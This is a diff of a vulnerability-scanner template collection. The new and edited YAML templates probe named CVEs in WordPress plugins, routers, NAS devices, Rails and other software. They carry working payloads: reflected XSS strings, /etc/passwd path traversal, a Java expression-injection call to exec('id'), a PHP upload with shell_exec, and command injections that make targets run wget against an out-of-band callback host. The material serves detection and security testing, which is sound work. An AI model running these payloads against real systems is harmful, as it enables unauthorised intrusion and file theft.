- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"
body: "amty_hidden=1"
@ -21,7 +21,7 @@ requests:
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -17,7 +17,7 @@ requests:
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
- "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=javascript:prompt(123)>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
- "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(123)>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -0,0 +1,27 @@
id: CVE-2018-16059
info:
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
author: daffainfo
severity: medium
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- https://www.exploit-db.com/exploits/45342
tags: cve,cve2018,iot,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/fcgi-bin/wgsetcgi"
body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200

View File

@ -1,11 +1,13 @@
id: wp-wechat-broadcast-lfi
id: CVE-2018-16283
info:
name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/45438
tags: wordpress,wp-plugin,lfi
severity: critical
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2018-16283
- https://www.exploit-db.com/exploits/45438
tags: cve,cve2018,wordpress,wp-plugin,lfi
requests:
- method: GET

View File

@ -2,7 +2,7 @@ id: CVE-2018-16299
info:
name: WordPress Plugin Localize My Post 1.0 - LFI
author: 0x_Akoko
author: 0x_Akoko,0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/45439
tags: wordpress,cve2018,cve,lfi

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
- '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -1,22 +1,46 @@
id: CVE-2018-3760
info:
name: Rails CVE-2018-3760
author: 0xrudra
name: Ruby On Rails Path Traversal
author: 0xrudra,pikpikcu
severity: high
reference: |
- https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760
- https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
- https://seclists.org/oss-sec/2018/q2/210
- https://xz.aliyun.com/t/2542
description: |
Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files.
There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.
tags: cve,cve2018,rails,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
- raw:
- |
GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 94
- |
GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
extractors:
- type: regex
name: path
internal: true
part: body
regex:
- "/etc/passwd is no longer under a load path: (.*?),"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -2,7 +2,7 @@ id: CVE-2018-7422
info:
name: WordPress Site Editor Plugin LFI
author: LuskaBol
author: LuskaBol,0x240x23elu
severity: high
tags: cve,cve2018,wordpress,wp-plugin,lfi
description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
@ -12,8 +12,9 @@ requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
- "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
matchers-condition: and
matchers-condition: or
matchers:
- type: word
words:
@ -22,6 +23,7 @@ requests:
part: body
condition: and
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -2,7 +2,7 @@ id: CVE-2019-15713
info:
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
author: daffainfo,dhiyaneshDk
severity: medium
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
reference: |
@ -13,13 +13,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
- '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=confirm(123)>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
- '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fpath%3E'
- '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -8,13 +8,15 @@ info:
refrense: |
- https://swarm.ptsecurity.com/openfire-admin-console/
- https://github.com/igniterealtime/Openfire/pull/1497
tags: cve,cve2019,ssrf
tags: cve,cve2019,ssrf,openfire,oob
requests:
- method: GET
path:
- "{{BaseURL}}/getFavicon?host=burpcollaborator.net"
- "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- <h1>Burp Collaborator Server</h1>
- "http"

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E'
- '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- 'foo"><svg//onload="alert(123)">'
- 'foo"></script><script>alert(document.domain)</script>'
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E'
- '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src onerror=alert(123)>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -0,0 +1,33 @@
id: CVE-2020-27866
info:
name: Netgear Authentication Bypass vulnerability
author: gy741
severity: high
description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
tags: cve,cve2020,netgear,auth-bypass
reference: |
- https://wzt.ac.cn/2021/01/13/AC2400_vuln/
- https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
requests:
- raw:
- |
GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'Debug Enable!'
part: body

View File

@ -0,0 +1,35 @@
id: CVE-2020-28188
info:
name: TerraMaster TOS - Unauthenticated Remote Command Execution
author: gy741
severity: critical
description: Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter.
reference: |
- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
- https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html
- https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
tags: cve,cve2020,terramaster,rce,oob
requests:
- raw:
- |
GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
Host: {{Hostname}}
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
Host: {{Hostname}}
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

View File

@ -0,0 +1,44 @@
id: CVE-2020-28871
info:
name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2020-28871
- https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
- https://www.exploit-db.com/exploits/48980
tags: cve,cve2020,monitorr,rce,oob
requests:
- raw:
- |
POST /assets/php/upload.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: text/plain, */*; q=0.01
Connection: close
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}
-----------------------------31046105003900160576454225745
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
Content-Type: image/gif
GIF89a213213123<?php shell_exec("wget -c http://{{interactsh-url}}");
-----------------------------31046105003900160576454225745--
- |
GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

View File

@ -1,11 +1,11 @@
id: wordpress-auth-bypass-wptimecapsule
id: CVE-2020-8771
info:
name: WordPress WP Time Capsule Authentication Bypass
author: princechaddha
severity: critical
reference: https://github.com/SECFORCE/WPTimeCapsulePOC
tags: wordpress,wp-plugin
tags: cve,cve2020,wordpress,wp-plugin
requests:
- raw:
@ -24,7 +24,6 @@ requests:
Accept: */*
cookie-reuse: true
matchers-condition: and
matchers:
- type: word

View File

@ -0,0 +1,26 @@
id: CVE-2021-21479
info:
name: SCIMono < v0.0.19 Remote Code Execution
author: dwisiswant0
severity: critical
reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
description: |
In SCIMono before 0.0.19, it is possible for an attacker to inject and
execute java expression compromising the availability and integrity of the system.
tags: cve,cve2021,scimono,rce
requests:
- method: GET
path:
- "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"
matchers:
- type: word
words:
- "The attribute value"
- "java.lang.UNIXProcess@"
- "has invalid value!"
- '"status" : "400"'
part: body
condition: and

View File

@ -0,0 +1,32 @@
id: CVE-2021-21801
info:
name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS)
author: gy741
severity: medium
description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
tags: cve,cve2021,r-seenet,xss
requests:
- method: GET
path:
- '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22'
matchers-condition: and
matchers:
- type: word
words:
- '"zlo onerror=alert(1) "'
- 'Device Status Graph'
part: body
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: CVE-2021-21802
info:
name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS)
author: gy741
severity: medium
description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
tags: cve,cve2021,r-seenet,xss
requests:
- method: GET
path:
- '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22'
matchers-condition: and
matchers:
- type: word
words:
- '"zlo onerror=alert(1) "'
- 'Device Status Graph'
part: body
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: CVE-2021-21803
info:
name: Advantech R-SeeNet is2sim parameter - Reflected Cross-Site Scripting (XSS)
author: gy741
severity: medium
description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
tags: cve,cve2021,r-seenet,xss
requests:
- method: GET
path:
- '{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22'
matchers-condition: and
matchers:
- type: word
words:
- '"zlo onerror=alert(1) "'
- 'Device Status Graph'
part: body
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2021-23241
info:
name: Mercury Router Web Server Directory Traversal
author: daffainfo
severity: medium
description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
reference: |
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
tags: cve,cve2021,iot,lfi,router
requests:
- method: GET
path:
- "{{BaseURL}}/loginLess/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
part: body
- type: status
status:
- 200

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E'
- '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E'
- '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=(alert)(123);>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
- '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(123);>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -1,4 +1,4 @@
id: wp-plugin-statistics-sqli
id: CVE-2021-24340
info:
name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection
@ -9,7 +9,7 @@ info:
- https://www.exploit-db.com/exploits/49894
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
- https://github.com/Udyz/WP-Statistics-BlindSQL
tags: wordpress,wp-plugin,unauth,sqli,blind
tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind
requests:
- method: GET

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E'
- '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>prompt(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -0,0 +1,36 @@
id: CVE-2021-24498
info:
name: Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: suman_kar
description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue.
severity: medium
tags: cve,cve2021,xss,wordpress,wp-plugin
reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86
requests:
- raw:
- |
GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- '><svg/onload=alert(1)><'
- 'Calendar Details'
part: body
condition: and
- type: word
words:
- 'text/html'
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: CVE-2021-26475
info:
name: EPrints 3.4.2 XSS
author: geeknik
description: EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI.
reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
severity: medium
tags: cve,cve2021,xss,eprints
requests:
- method: GET
path:
- "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</title><script>alert('{{randstr}}')</script>"
- type: word
part: header
words:
- "text/html"

View File

@ -1,12 +1,14 @@
id: moodle-jitsi-plugin-xss
id: CVE-2021-26812
info:
name: Moodle jitsi plugin XSS
author: aceseven (digisec360)
description: Cross-site Scripting in moodle jitsi plugin
description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject javascript code to be run by the application.
severity: medium
tags: moodle,jitsi,xss,revision
reference: https://github.com/udima-university/moodle-mod_jitsi/issues/67
tags: cve,cve2021,moodle,jitsi,xss
reference: |
- https://github.com/udima-university/moodle-mod_jitsi/issues/67
- https://nvd.nist.gov/vuln/detail/CVE-2021-26812
requests:
- method: GET
@ -27,4 +29,4 @@ requests:
- type: word
part: header
words:
- "text/html"
- "MoodleSession"

View File

@ -4,9 +4,7 @@ info:
name: Adobe AEM Default Credentials
author: random-robbie
severity: critical
tags: aem,default-login
reference:
tags: aem,default-login,fuzz
requests:
- payloads:

View File

@ -24,7 +24,10 @@ requests:
matchers:
- type: status
status:
- 201
- 200
condition: or
- type: word
part: body
words:

View File

@ -0,0 +1,26 @@
id: terramaster-login
info:
name: TerraMaster Login Panel
author: gy741
severity: info
tags: panel,terramaster
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: or
matchers:
- type: word
words:
- "<title>TOS Loading</title>"
part: body
- type: word
words:
- "Server: TOS"
- "X-Powered-By: TerraMaster"
condition: or
part: header

View File

@ -24,7 +24,7 @@ requests:
- type: dsl
dsl:
- '!contains(tolower(body), "<html")'
- '!contains(tolower(body), "<html") && !contains(tolower(body), "<!doctype") && !contains(tolower(body), "<script")'
- type: dsl
dsl:

21
network/vnc-detect.yaml Normal file
View File

@ -0,0 +1,21 @@
id: vnc-service-detection
info:
name: VNC Service Detection
author: pussycat0x
severity: info
tags: network,vnc
description: VNC service detection
network:
- inputs:
- data: "\r\n"
host:
- "{{Hostname}}:5900"
matchers:
- type: word
words:
- "RFB"
extractors:
- type: regex
part: body
regex:
- "RFB ([0-9.]+)"

View File

@ -2032,3 +2032,7 @@ requests:
name: "OpenSNS"
dsl:
- "status_code==200 && (\"1167011145\" == mmh3(base64_py(body)))"
- type: dsl
name: "SpamSniper"
dsl:
- "status_code==200 && (\"-1000719429\" == mmh3(base64_py(body)))"

View File

@ -0,0 +1,26 @@
id: mirai-unknown-rce
info:
name: Mirai Unknown - Remote Code Execution
author: gy741
severity: critical
description: The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection.
reference: |
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
tags: mirai,rce,oob
requests:
- raw:
- |
POST /cgi-bin/login.cgi HTTP/1.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
key=';`wget http://{{interactsh-url}}`;#
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

View File

@ -10,13 +10,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E"
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert('{{randstr}}')</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -10,13 +10,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E'
- '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -10,13 +10,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -10,13 +10,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E '
- '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -1,19 +0,0 @@
id: wp-localize-post-lfi
info:
name: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/45439
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -1,19 +0,0 @@
id: wp-mail-masta-lfi
info:
name: WordPress Plugin Mail Masta 1.0 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/40290
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -10,13 +10,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -10,13 +10,13 @@ info:
requests:
